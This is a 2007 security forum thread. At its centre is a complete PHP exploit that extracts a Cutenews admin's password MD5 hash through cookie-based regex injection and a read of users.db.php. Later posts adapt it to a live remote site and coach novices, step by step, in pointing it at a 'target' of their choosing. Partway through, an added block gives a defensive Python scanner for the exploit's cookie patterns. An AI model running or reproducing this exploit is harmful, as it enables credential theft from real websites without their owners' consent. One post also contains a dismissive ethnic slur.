IT Security and Insecurity Portal

Cutenews <= 1.4.5 admin password md5 hash fetch exploit

Posted: Sun Dec 23, 2007 10:49 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Code:
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 admin password md5 hash fetching exploit
// Version 1.1
// written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_COOKIE, so no log fear
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$start_time = time();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
set_time_limit(0);
}
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews password md5 hash fetching started");
add_logline("Target: $target");
add_logline("Username: $username");
pre_test();
$h = get_hash();
$run_time = time() - $start_time;
add_logline("MD5 hash: $h");
xecho("\nFinal MD5 hash: $h", 1);
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);
exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function get_hash()
{
$hash = '';
for($i = 0; $i < 32; $i ++)
{
xecho("Finding hash char pos $i");
$c = get_hash_char($i);
$hash .= $c;
xecho("Current hash: $hash");
}
return $hash;
}
///////////////////////////////////////////////////////////////////////
function get_hash_char($pos)
{
global $username;
$un = "^$username\$";
$charset = '0123456789abcdef';
$beg = '^';
if($pos > 0)
{
$beg .= "([a-f0-9]{{$pos}})";
}
$end = '$';
if($pos < 31)
{
$cnt = 31 - $pos;
$end = "([a-f0-9]{{$cnt}})\$";
}
for($i = 8; $i > 0; $i >>= 1)
{
$first = substr($charset, 0, $i);
$second = substr($charset, $i);
$hp = "$beg([$first])$end";
if( make_query($un, $hp) === 1)
{
xecho("Position $pos: [$first]");
$charset = $first;
}
else
{
xecho("Position $pos: [$second]");
$charset = $second;
}
}
return $charset;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
global $username;
// Target URL valid?
xecho("Validating target URL");
if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
{
die('Target URL not valid!');
}
xecho("URL is valid");
$un = "^$username\$";
if( make_query($un) !== 1)
{
die('Pretest 1 failed - wrong username?');
}
else
{
xecho("Pretest 1 passed - username OK", 1);
}
$hp = '^[a-f0-9]{32}$';
if( make_query($un, $hp) !== 1)
{
die('Pretest 2 failed - target not vulnerable?');
}
else
{
xecho("Pretest 2 passed - regex injection OK", 1);
}
$hp = '^[a-f0-9]{1337}$';
if( make_query($un, $hp) !== 0)
{
die('Pretest 3 failed - target not vulnerable?');
}
else
{
xecho("Pretest 3 passed - regex injection OK", 1);
}
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $hashpattern = '')
{
global $target;
$max_retries = 10;
$cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
if(!empty($hashpattern))
{
$cookie .= ";story=$hashpattern";
}
for($retry = 0; $retry < $max_retries + 1; $retry ++)
{
if($retry > 0)
{
xecho("Request failed!", 1);
xecho("Sleeping $retry seconds", 1);
sleep($retry);
xecho("Awake ...", 1);
xecho("Retry #$retry", 1);
}
$buff = make_get($target, $cookie);
$ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
if($ret > 0)
{
$ret = intval(substr($hits[0], 1));
if($ret > -1)
{
return $ret;
}
}
}
die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
{
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
$GLOBALS['requests'] ++;
return $fc;
}
//////////////////////////////////////////////////////////////////////
function add_logline($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
//////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
if($GLOBALS['cli'])
{
echo "$line\n";
}
elseif($both)
{
$line = nl2br(htmlspecialchars($line));
echo "$line<br />\n";
}
}
/////////////////////////////////////////////////////////////////////
?>
Feedback is welcome

Last edited by waraxe on Mon Dec 24, 2007 11:07 pm; edited 3 times in total
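The exploit above carries its whole payload in the Cookie header (its own comment: "Attack goes through $_COOKIE, so no log fear"), which is also what makes it easy to spot once cookies are logged or inspected at a proxy. The following Python scan is an added example, not code from the original post or from Cutenews: it parses Cookie headers of the shape the exploit sends and flags two things, a files_arch[] value outside the archive directory (ARCHIVE_PREFIX is an assumed layout) and regex metacharacters in the title or story search terms; the sample headers are constructed.

```python
import re
from urllib.parse import unquote

# Assumption (not from the post): files search.php may legitimately read live under this prefix;
# anything else requested through files_arch[] is flagged. Adjust to the install's layout.
ARCHIVE_PREFIX = "./data/archives/"

# Metacharacters a plain-text search term has no use for, but which the page's
# regex-injection payloads rely on: ^ $ [ ] ( ) { } | and backslash.
REGEX_META = re.compile(r"[\^\$\[\]\(\)\{\}\|\\]")

# Constructed sample Cookie header values (not captured traffic). The first three follow the
# exploit's cookie layout: username pretest, hash-length pretest, one binary-search step at position 3.
SAMPLE_COOKIES = [
    "dosearch=yes;files_arch[]=./data/users.db.php;title=^waraxe$",
    "dosearch=yes;files_arch[]=./data/users.db.php;title=^waraxe$;story=^[a-f0-9]{32}$",
    "dosearch=yes;files_arch[]=./data/users.db.php;title=^waraxe$;story=^([a-f0-9]{3})([01234567])([a-f0-9]{28})$",
    "dosearch=yes;files_arch[]=./data/archives/2007.news.arch;title=christmas",
]

def parse_cookie(header):
    """Split a Cookie header into (name, value) pairs, keeping repeated names such as files_arch[]."""
    pairs = []
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            pairs.append((name, unquote(value)))
    return pairs

def classify(header):
    """Return the findings for one Cookie header; an empty list means nothing suspicious."""
    findings = []
    for name, value in parse_cookie(header):
        if name == "files_arch[]":
            # A search may only read archive files; users.db.php or any traversal is file-read abuse.
            if ".." in value or not value.startswith(ARCHIVE_PREFIX):
                findings.append("file-read:" + value)
        elif name in ("title", "story") and REGEX_META.search(value):
            # Anchors, classes and counted groups in a search term are the injection oracle at work.
            findings.append("regex-injection:" + name)
    return findings

def scan(headers):
    """Map each suspicious header to its findings, e.g. over a batch of logged Cookie headers."""
    return {h: classify(h) for h in headers if classify(h)}

if __name__ == "__main__":
    for header, findings in scan(SAMPLE_COOKIES).items():
        print(header, "->", ", ".join(findings))
```

Apache's default combined LogFormat does not record cookies; adding %{Cookie}i to the LogFormat, or running the check in a reverse proxy, is what makes these headers visible.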
Posted: Mon Dec 24, 2007 10:56 am

pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria
Wow waraxe, you are a great dude. Very nice work and stupid bug. :) God bless you. ;) Merry Christmas.
Posted: Mon Dec 24, 2007 12:18 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
Merry Christmas
cant work out

Posted: Mon Dec 24, 2007 4:55 pm

theface
Active user
Joined: Dec 24, 2007
Posts: 33
I am running the script on a Windows machine, and when I try to connect to the local machine it works. But when I try to connect to a remote server it gives me a server timeout:
"Fatal errror - server down?"
Any suggestions?
Re: cant work out

Posted: Mon Dec 24, 2007 6:00 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
theface wrote: | I am running the script on a Windows machine, and when I try to connect to the local machine it works. But when I try to connect to a remote server it gives me a server timeout:
"Fatal errror - server down?"
Any suggestions? |
This is the code fragment:
Code:
$buff = make_get($target, $cookie);
$x = strpos($buff, '<b>Founded News articles [');
$y = strpos($buff, ']:</b>', $x + 25);
if( ($x !== false) && ($y !== false) && ($x < $y) )
{
$buff = trim(substr($buff, $x + 26, $y - $x - 26));
$ret = intval($buff);
if( ($ret > -1) && ($ret < 2) )
{
return $ret;
}
}
}
die('Fatal errror - server down?');
So this error message can be a little bit misleading, sorry ...
It means that the server response does not contain the "Founded News articles " pattern as expected. I tested my exploit script against many targets and it always worked. In your case this problem can be related to modified Cutenews scripts, so that the output looks different, or there are other malfunctions. I suggest you write some debugging code right after the make_get() function. Example:
Code:
$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
$x = strpos($buff, '<b>Founded News articles [');
$y = strpos($buff, ']:</b>', $x + 25);
In this way you can see the details of the server response in plain text, and if there are any error messages, like "cannot open file" or something like that, then feel free to post the details here. Maybe I am able to help.
Posted: Mon Dec 24, 2007 6:18 pm

theface
Active user
Joined: Dec 24, 2007
Posts: 33
Actually I think the problem is
Code:
$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
$x = strpos($buff, '<b>Founded News articles [');
$y = strpos($buff, ']:</b>', $x + 25);
Instead of "Founded News articles" they have changed it to come in a different font, I mean, so it's not coming with that; it gives that text in another language.
So can that be a problem?
Code:
Debug: HTTP/1.0 200 OK Date: Mon, 24 Dec 2007 18:14:18 GMT Server: Apache Content-Type: text/html X-Cache: MISS from proxy104.rol.net.mv X-Cache-Lookup: MISS from proxy104.rol.net.mv:8080 Via: 1.0 proxy104.rol.net.mv:8080 (squid/2.6.STABLE5) Connection: close
ޚަބަރު; <------ THIS IS neWS
ޞުރުހީ <--------- THIS IS TITLE
ލިޔުންތެރިޔާ <------ THIS IS WRITER
ދުވަހުން 12345678910111213141516171819202122232425262728293031 JanFebMarAprMayJunJulAugSepOctNovDec 20032004200520062007200820092010
ދުވަހަށް 12345678910111213141516171819202122232425262728293031JanFebMarAprMayJunJulAugSepOctNovDec20032004200520062007200820092010
ކުރީގެ ޚަބަރުވެސް ހޯދާ <------ THIS IS LOOK IN ARCHIVES
އެޑްވާންސް <----- THIS IS ADVANCE
ފެނުނު އާޓިކަލް؛ [35]:
This is what I am getting now. Any suggestions?
ފެނުނު އާޓިކަލް؛ [35 <----- this is "Founded News articles [0]:"
Posted: Mon Dec 24, 2007 10:08 pm

pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria
Looks like Arabic shit.
Posted: Mon Dec 24, 2007 10:50 pm

theface
Active user
Joined: Dec 24, 2007
Posts: 33
koko wrote: | Looks like Arabic shit. |
No, it's Maldivian, called Dhivehi.
Posted: Mon Dec 24, 2007 11:01 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
I got it to work. I was making the pattern recognition code more flexible.
Just look at the exploit posted above - I have made changes and now it's version 1.1.
And of course - feedback is welcome - let me know if it works.
Posted: Sun Jan 13, 2008 5:18 pm

onez
Regular user
Joined: Jan 12, 2008
Posts: 5
Can I get a detailed explanation on how I can set this up and get it going... thank you
Posted: Sun Jan 13, 2008 9:01 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
onez wrote: | Can I get a detailed explanation on how I can set this up and get it going... thank you |
First download PHP for Windows:
http://www.php.net/downloads.php
Maybe this version is the best choice:
http://ee2.php.net/get/php-5.2.5-win32-installer.msi/from/a/mirror
Install it - now you have PHP on your home PC.
Next copy-paste the PHP code from my exploit and put it into a text file "cutemd5.php". That's the exploit script in the PHP language.
And finally - search for a target. You must have the URL of the target website's "search.php" script. Something like this:
Code: | http://localhost/cutenews.1.4.5/search.php |
After you have done all these preparations, come back here and let me know. And then I will explain how to run the exploit.
One more thing to do - change the username in the script to the target's username.
Last edited by waraxe on Mon Jan 14, 2008 5:59 pm; edited 2 times in total
Posted: Sun Jan 13, 2008 11:03 pm

onez
Regular user
Joined: Jan 12, 2008
Posts: 5
I downloaded PHP.
I copied and pasted the code and it's in a .php file.
I found a target.
Posted: Mon Jan 14, 2008 12:26 am

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
Now edit your exploit script.
Search for this:
Code:
$target = 'http://localhost/cutenews.1.4.5/search.php';
and change it to your target, example:
Code:
$target = 'http://www.mytarget.com/search.php';
Next create a new text file "go.cmd" and write "cmd" in it.
After saving that file, its icon should look in Windows like an old "bat" file. It means that this file is a Windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see a black window - the command prompt.
Type "php" and look at what happens. If the PATH parameter is set correctly, then you should see no error messages. If PATH is not set as needed, then an error message will show up.
Please try these steps and let me know about the results.
Posted: Mon Jan 14, 2008 12:53 pm

pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria
My way.
Create a new .txt file and put this inside:
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd]
@="Open DOS here"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd\command]
@="cmd.exe /k\"set path=%path%;z:\\\\tools&&cd %L\\\""
Rename this .txt to somename.reg. Right-click on the file >> Merge.
Next, go to the php folder. Right-click on the php folder, "Open DOS here". This opens a command prompt. Next open the folder where you saved your exploit. Type in the prompt, for example:
php.exe K:\myfolder\myexploit.php
... and press Enter
Posted: Mon Jan 14, 2008 1:55 pm

onez
Regular user
Joined: Jan 12, 2008
Posts: 5
waraxe wrote: | Now edit your exploit script.
Search for this:
Code:
$target = 'http://localhost/cutenews.1.4.5/search.php';
and change it to your target, example:
Code:
$target = 'http://www.mytarget.com/search.php';
Next create a new text file "go.cmd" and write "cmd" in it.
After saving that file, its icon should look in Windows like an old "bat" file. It means that this file is a Windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see a black window - the command prompt.
Type "php" and look at what happens. If the PATH parameter is set correctly, then you should see no error messages. If PATH is not set as needed, then an error message will show up.
Please try these steps and let me know about the results. |
OK, I did all that and got no error.
What are the next steps?
All times are GMT
Page 1 of 4